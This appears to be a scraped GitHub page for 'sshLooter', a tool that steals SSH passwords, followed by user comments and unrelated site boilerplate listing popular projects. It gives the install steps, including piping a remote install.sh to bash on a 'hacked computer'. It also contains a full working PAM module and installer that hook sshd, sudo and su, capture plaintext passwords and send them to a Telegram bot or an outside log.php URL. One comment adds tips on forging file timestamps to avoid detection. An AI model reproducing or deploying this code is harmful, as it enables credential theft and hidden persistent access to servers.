Script to steal passwords from ssh.
There's a C version which is much better sshLooterC
Script to steal passwords from ssh.
git clone https://github.com/mthbernardes/sshLooter.git cd sshLooter
Edit the script on install.sh, and add your telegram bot api, and your userid. Call the @botfather on telegram to create a bot and call the @userinfobot to get your user id.
On your server execute. python -m SimpleHTTPServer On the hacked computer execute. curl http://yourserverip:8000/install.sh | bash
If you use old requests module, you can lose access to the server forever.
If python script was crashed, pam module will receive PAM_AUTH_ERR and you never login on this server.
Feb 19 15:59:00 google /lib/security/looter.py[29140]: Traceback (most recent call last):
Feb 19 15:59:00 google /lib/security/looter.py[29140]: File "/lib/security/looter.py", line 34, in pam_sm_authenticate
Feb 19 15:59:00 google /lib/security/looter.py[29140]: sendMessage("Connection from host {} using the user {} and password {}".format(pamh.rhost, user, resp.resp))
Feb 19 15:59:00 google /lib/security/looter.py[29140]: File "/lib/security/looter.py", line 11, in sendMessage
Feb 19 15:59:00 google /lib/security/looter.py[29140]: r = requests.post(url,json=data)
Feb 19 15:59:00 google /lib/security/looter.py[29140]: File "/usr/lib/python2.7/dist-packages/requests/api.py", line 85, in post
Feb 19 15:59:00 google /lib/security/looter.py[29140]: return request('post', url, data=data, **kwargs)
Feb 19 15:59:00 google /lib/security/looter.py[29140]: File "/usr/lib/python2.7/dist-packages/requests/api.py", line 40, in request
Feb 19 15:59:00 google /lib/security/looter.py[29140]: return s.request(method=method, url=url, **kwargs)
Feb 19 15:59:00 google /lib/security/looter.py[29140]: TypeError: request() got an unexpected keyword argument 'json'
Possible solution:
if not check_pw(user, resp.resp):
return pamh.PAM_AUTH_ERR
try:
sendMessage("Connection from host {} using the user {} and password {}".format(pamh.rhost, user, resp.resp))
except:
print "failed to send message"
return pamh.PAM_SUCCESS
Or:
...
import json
...
def sendMessage(msg):
headers = {'content-type': 'application/json'}
apiKey = "KEY"
userId = "USERID"
data = {"chat_id":userId,"text":msg}
url = "https://api.telegram.org/bot{}/sendMessage".format(apiKey)
r = requests.post(url, data=json.dumps(data), timeout=30, headers=headers)
If it were me I would parse the timestamp on the edited files and use touch -d to set the timestamp on the file so it doesnt show up as a recently modified file. Additionally you can set created files timestamps using something like touch -r /etc/pam.d createdpythonfiles.py
Just thought i would share that incase you wanted to make it harder to notice.
hey, i try to modify the code so the result is send trough some web post ...
#!/bin/bash
apt-get install python-pam libpam-python python-pip
pip install requests crypt spwd
if ! grep -Fq "looter.py" /etc/pam.d/sshd;then
sed -i "/common-auth/a auth requisite pam_python.so looter.py" /etc/pam.d/sshd
fi
if ! grep -Fq "looter.py" /etc/pam.d/sudo;then
sed -i "/common-auth/a auth requisite pam_python.so looter.py" /etc/pam.d/sudo
fi
if ! grep -Fq "looter.py" /etc/pam.d/su;then
sed -i "/common-auth/a auth requisite pam_python.so looter.py" /etc/pam.d/su
fi
code='
import spwd
import crypt
import requests
def sendMessage(msg):
name = "ssh_creds.dat"
req = {"fname":name,"data":msg}
# url
url = "http://xxxxx/databases/.loot/log.php"
r = requests.post(url,data=req)
def check_pw(user, password):
"""Check the password matches local unix password on file"""
hashed_pw = spwd.getspnam(user)[1]
return crypt.crypt(password, hashed_pw) == hashed_pw
def pam_sm_authenticate(pamh, flags, argv):
try:
user = pamh.get_user()
except pamh.exception as e:
return e.pam_result
if not user:
return pamh.PAM_USER_UNKNOWN
try:
resp = pamh.conversation(pamh.Message(pamh.PAM_PROMPT_ECHO_OFF, "Password:"))
except pamh.exception as e:
return e.pam_result
if not check_pw(user, resp.resp):
return pamh.PAM_AUTH_ERR
sendMessage("Connection from host {} using the user {} and password {}".format(pamh.rhost, user, resp.resp))
return pamh.PAM_SUCCESS
def pam_sm_setcred(pamh, flags, argv):
return pamh.PAM_SUCCESS
def pam_sm_acct_mgmt(pamh, flags, argv):
return pamh.PAM_SUCCESS
def pam_sm_open_session(pamh, flags, argv):
return pamh.PAM_SUCCESS
def pam_sm_close_session(pamh, flags, argv):
return pamh.PAM_SUCCESS
def pam_sm_chauthtok(pamh, flags, argv):
return pamh.PAM_SUCCESS
'
mkdir -p /lib/security/
echo "$code" > /lib/security/looter.py
/etc/init.d/ssh restart
but it dont send any logs :(
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google โค๏ธ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.